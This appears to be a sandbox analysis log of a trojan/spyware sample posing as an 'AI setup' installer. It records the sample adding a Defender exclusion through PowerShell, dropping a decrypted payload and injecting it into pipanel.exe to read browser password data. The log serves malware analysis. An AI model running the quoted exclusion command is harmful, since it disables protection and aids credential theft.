Source: mDHwap5GlV.exe, 00000000.00000002.2605944100.000000000D560000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Buffers.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2605944100.000000000D560000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2584388543.0000000009CB6000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenamePro_AI_setup_v_1.03.dllH vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Text.Encoding.Extensions.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.RuntimeInformation.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Console.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2587474664.000000000A841000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.CSharp.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2616718096.000000000E6A0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2616718096.000000000E6A0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2616718096.000000000E6A0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.Timer.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2596096978.000000000D060000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2596096978.000000000D060000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenamemscordaccore.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenamePro_AI_setup_v_1.03.dllH vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.CSharp.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.Core.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.AppContext.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.Buffers.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs mDHwap5GlV.exe
Source: mDHwap5GlV.exe Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs mDHwap5GlV.exe
Uses 32bit PE files
Source: mDHwap5GlV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: powershell.exe, 00000004.00000002.1923580588.00000000072C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .sLn[
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/4@3/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_03
Source: C:\Users\user\Desktop\mDHwap5GlV.exe File created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Jump to behavior
Source: mDHwap5GlV.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: pipanel.exe, 00000008.00000003.3151850567.0000000005374000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3177263165.0000000005341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: mDHwap5GlV.exe String found in binary or memory: requests-started-rate
Source: mDHwap5GlV.exe String found in binary or memory: requests-started
Source: mDHwap5GlV.exe String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: mDHwap5GlV.exe String found in binary or memory: Morph - Structs/AddrExp
Source: mDHwap5GlV.exe String found in binary or memory: prejitNYI: patchpoint info generationlooptail.call and not BBINSTRImportationPre-importExpand patchpointsIndirect call transformProfile instrumentation prepPost-importProfile incorporationProfile instrumentationMorph - InliningMorph - InitAllocate ObjectsMorph - Add internal blocksRemove empty finallyRemove empty tryClone finallyMerge callfinally chainsCompute predsUpdate finally target flagsMorph - Structs/AddrExpUpdate flow graph early passMorph - ByRefsForward SubstitutionMorph - GlobalMorph - Promote StructsGS CookieMorph - FinishMerge throw blocksCompute edge weights (1, false)Optimize control flowInvert loopsCompute blocks reachabilityOptimize layoutRedundant zero InitsSet block weightsClone loopsFind loopsClear loop infoUnroll loopsHoist loop codeMorph array opsOpt add copiesMark local varsFind oper orderOptimize boolsBuild SSA representationSet block orderSSA: Doms1SSA: topological sortSSA: DFSSA: livenessSSA: renameSSA: insert phisDo value numberingEarly Value PropagationOptimize Valnum CSEsOptimize index checksRedundant branch optsVN based copy propUpdate flow graph opt passAssertion propInsert GC PollsCompute edge weights (2, false)Rationalize IRDetermine first cold blockLocal var livenessDo 'simple' loweringPer block local var livenessLocal var liveness initLowering decompositionGlobal local var livenessCalculate stack level slotsLowering nodeinfoLSRA build intervalsLinear scan register allocLSRA resolveLSRA allocateGenerate codePlace 'align' instructionsEmit GC+EH tablesEmit codePost-EmitProcessor does not have a high-frequency timer.
Source: mDHwap5GlV.exe String found in binary or memory: kernelbase.dllVirtualAlloc2MapViewOfFile3bad array new lengthstring too longApplication root path is empty. This shouldn't happenUsing internal fxrUsing internal hostpolicyPath containing probing policy and assemblies to probe for.--depsfile--additionalprobingpath<path>Path to <application>.runtimeconfig.json file.--fx-versionPath to <application>.deps.json file.--runtimeconfig--roll-forward<value><version>Version of the installed Shared Framework to use to run the application.Path to additional deps.json file.--roll-forward-on-no-candidate-fxRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)--additional-depssdkParsed known arg %s = %s<n><obsolete>Using the provided arguments to determine the application to execute.Application '%s' is not a managed executable.Failed to parse supported options or their values: %s %-*s %sThe application to execute does not exist: '%s'--- Executing in split/FX mode...Application '%s' does not exist.dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'execstatic--- Executing in a native executable mode...--- Executing in muxer mode... No SDKs were found.
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/download --list-runtimes Display the installed runtimes --list-sdks Display the installed SDKs The path to an application .dll file to execute.host-options: --info Display .NET information.vector too longCommon Options: -h|--help Displays this help.invalid hash bucket countinvalid string positionunordered_map/set too long--- Invoked %s [commit hash: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.json.dev.jsonHosting components are already initialized. Re-initialization to execute an app is not allowed.|arch|/|tfm|Ignoring host interpreted additional probing path %s as it does not exist.Runtime config is cfg=%s dev=%s|arch|\|tfm|App runtimeconfig.json from [%s]Specified runtimeconfig.json from [%s]Ignoring additional probing path %s as it does not exist.The specified runtimeconfig.json [%s] does not existDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d].runtimeconfig.jsonInvalid runtimeconfig.json [%s] [%s].deps.jsonIt's invalid to use both '%s' and '%s' command line options.DOTNET_ADDITIONAL_DEPSThe specified deps.json [%s] does not existInvalid value for command line argument '%s'self-containedExecuting as a %s app as per config file [%s]HOSTFXR_PATHframework-dependent--list-sdks--list-runtimesUsing dotnet root path [%s]-?/?-h--help dotnet.dll--infoThe command could not be loaded, possibly because:
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/download --list-runtimes Display the installed runtimes --list-sdks Display the installed SDKs The path to an application .dll file to execute.host-options: --info Display .NET information.vector too longCommon Options: -h|--help Displays this help.invalid hash bucket countinvalid string positionunordered_map/set too long--- Invoked %s [commit hash: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.json.dev.jsonHosting components are already initialized. Re-initialization to execute an app is not allowed.|arch|/|tfm|Ignoring host interpreted additional probing path %s as it does not exist.Runtime config is cfg=%s dev=%s|arch|\|tfm|App runtimeconfig.json from [%s]Specified runtimeconfig.json from [%s]Ignoring additional probing path %s as it does not exist.The specified runtimeconfig.json [%s] does not existDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d].runtimeconfig.jsonInvalid runtimeconfig.json [%s] [%s].deps.jsonIt's invalid to use both '%s' and '%s' command line options.DOTNET_ADDITIONAL_DEPSThe specified deps.json [%s] does not existInvalid value for command line argument '%s'self-containedExecuting as a %s app as per config file [%s]HOSTFXR_PATHframework-dependent--list-sdks--list-runtimesUsing dotnet root path [%s]-?/?-h--help dotnet.dll--infoThe command could not be loaded, possibly because:
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: mDHwap5GlV.exe String found in binary or memory: /notify-launch
Source: unknown Process created: C:\Users\user\Desktop\mDHwap5GlV.exe "C:\Users\user\Desktop\mDHwap5GlV.exe"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\" Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe" Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: icu.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: msquic.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: wshunix.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: webio.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Section loaded: userenv.dll Jump to behavior
